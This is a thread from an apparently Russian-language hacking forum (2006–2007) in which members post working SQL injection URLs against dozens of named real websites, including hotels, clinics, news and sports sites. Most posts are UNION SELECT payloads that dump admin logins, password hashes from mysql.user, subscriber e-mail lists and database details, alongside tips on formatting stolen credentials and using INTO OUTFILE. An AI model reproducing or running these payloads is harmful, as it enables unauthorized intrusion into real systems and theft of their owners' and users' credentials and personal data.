SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Underwit

    Underwit Banned

    Joined:
    6 Oct 2006
    Messages:
    191
    Likes Received:
    137
    Reputations:
    16
    http://www.travellatvia.lv/8/90/0/ru/?main=5&reg=1'
     
  2. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    через раз отвечало мне internal error, так что не доделал:

    чего-то колонки в Customers не вытянул
     
    #622 Thanat0z, 28 Feb 2007
    Last edited: 28 Feb 2007
    2 people like this.
  3. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
     
    1 person likes this.
  4. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Моя первая скуль...
    http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-9%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&mode=chrono&order=0

    P.S. Если кто-нибудь доведет её до ума, я буду благодарен...
     
    #624 Iceangel_, 28 Feb 2007
    Last edited: 28 Feb 2007
    1 person likes this.
  5. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.italyhotel.ru/index.php?d=stadt&id=-29+union+select+1,2,3,4,5,6,7,8,9,password,11,user+from+mysql.user/*
     
    3 people like this.
  6. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://www.multidmedia.com/news/news.php?id=-62+union+select+1,2,VERSION(),4,5/*

    http://www.trud.ru/issue/news.php?id=-2215+union+select+1,2,5,4,5,6,7/*

    http://www.almaz-antey.ru/news.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+users/*

    http://www.whenhamstersattack.com/news.php?id=-4+union+select+1,2,3,4,5,6,7/*

    http://www.mostrud.ru/news.php?id=-48+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user/*

    http://www.footballfoundation.com/news.php?id=-581+union+select+1,2,3,4,5,6,7+from+mysql.user/*

    http://www.gamersinfo.net/content/news.php?id=-168+union+select+1,2,3,4,5,6,7,8,9+from+user/*

    http://fishres.ru/news/news.php?id=-4471+union+select+1,2,3,4,5,6,7,8,9/*

    http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*

    http://www.akdgs.ru/news.php?id=-49+union+select+1,2,3,4,5,6/*

    http://www.marchespublics.net/actualite/news.php?id=-635+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

    http://www.filmdeculte.com/news/news.php?id=-3094+union+select+1,2,3,4,5,6,7,8,9,10,11/*

    http://www.tabdc.org/news.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

    http://www.abajour.ru/news.php?id=-19+union+select+1,2,3,4,5/*

    http://www.liverpoolfc.ru/news.php?id=-859+union+select+1,2,3,4,5,6+from+users/*
     
    3 people like this.
  7. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+from+mysql.user/*

    Into Outfile можно применить!
     
  8. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    __http://www.glimm-med.de/clinics.php?id=-1+union+select+1,id,3,4,login,password,7,8,9,10+from+users/*

    __http://www.medsys.ru/index.phtml?mm=quest&sm=faq&ctype=15&cdir=-1+union+select+1,2,3,4,5/*

    __http://www.androlog.ru/?module=publications&id=-1+union+select+1,user(),3,4,5/*
     
    #628 Grey, 28 Feb 2007
    Last edited: 28 Feb 2007
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Юзай concat(user,char(58),password)
    или вместо char(58) ставь 0x3a. Это всего навсего ":" , но так удобнее:)
     
  10. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.tectonic.co.za/view.php?id=-1+union+select+concat(username,0x3a,password),2+from+users/*
    в title


    Code:
    http://www.mp3search.by/artist.php?id=-1+union+select+1,concat(login,0x3a,password)+from+admin/*
    байан делетед
     
    #630 n1†R0x, 28 Feb 2007
    Last edited: 28 Feb 2007
    1 person likes this.
  11. anchouse

    anchouse Member

    Joined:
    13 Jun 2006
    Messages:
    0
    Likes Received:
    35
    Reputations:
    0
    первая скула , подбор столбцов не получился ,если кто сможет что нить сделать ,пишите ,90% что стоит префикс у бд.
    http://www.green-pik.ru/user_profile.php?id=-7838%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
     
    3 people like this.
  12. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    __http://www.tvmed.ru/?module=custompage&id=-1+union+select+1,2,user(),4,5,database(),7,8,9,10/*

    __http://www.smdoctors.ru/razdel.php?R=-1+union+select+1,user(),3,4,5,6,7,8,9/*

    __http://www.lakident.ru/index.php?id=-1+union+select+1,database(),user(),4/*
     
    2 people like this.
  13. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.php.com/include/events/eventdetail.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
    =)
     
    6 people like this.
  14. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Моя первая:
    Code:
    http://www.rakurs.rovno.ua/info.php?id=-2879%20union%20select%201,2,3,4,5,6,7,8,9,s.*%20from%20subscribers%20s%20limit%201,1/*
    http://www.rakurs.rovno.ua/info.php?id=-2879%20union%20select%201,2,3,s.*,11%20from%20customer%20s%20limit%204,1/*
    
     
    5 people like this.
  15. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Здесь вытянул таблицу с мейлами, тех кто подписался на рассылку:

    __http://www.do-posle.ru/new_diz/show.php?id=-1+union+select+1,id,3,4,mail,6,7+from+mail/*

    Здесь ничего особенного:

    __http://www.psychiatry.ru/library/lib/article.php4?booknumber=6&article_id=-1+union+select+1,2,3,4,5,6/*
     
  16. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://www.ifbikes.com/news.php?id=-76+union+select+1,2,3,4,5,6,7,8,9,10,11/*

    http://www.russianrugby.ru/news.php?Id=-697+union+select+1,2,3,4,5,6/*

    http://www.healthsentinel.com/news.php?event=news_print_list_item&id=-1732+union+select+1,2,3,4,5,6,7,8,9,10,11/*

    http://www.reusablebags.com/news.php?id=-17+union+select+1,VERSION(),3,4,5,6,7,8,9/*

    http://www.sakhalin.environment.ru/news.php?id=-37+union+select+1,2,3,4,5/*

    http://www.ihrc.org.uk/show.php?id=-1740+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13/*

    http://www.foxreality.com/show.php?id=-4373+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+INFORMATION_SCHEMA.TABLES/*

    http://www.rusbiotech.ru/novice/show.php?id=-1832+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*

    http://www.radioguerrilla.ro/show.php?id=-21+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11/*
     
    1 person likes this.
  17. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://www.shanson.info/mp3/view_cat2.php?id=-6+union+select+1,2,concat(user(),char(58),database(),char(58),version())/*
    с таблицами беда.
     
  18. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    __http://www.atletika.ru/otdel.php?otdel=-1+union+select+1,concat(name,char(58),pass),3,4,5,6,7,8,9,10,11,12,13+from+user/*

    __http://www.nmsmoscow.ru/index.php?r=3&s=-1+union+select+1,2,user(),4/*

    __http://www.a2dent.ru/index.php?page=-1+union+select+1,user(),database(),4,5,6,7,8,9,10/*
     
  19. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    ___
     
    5 people like this.
  20. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    мой небольшой улов =)
     
Thread Status:
Not open for further replies.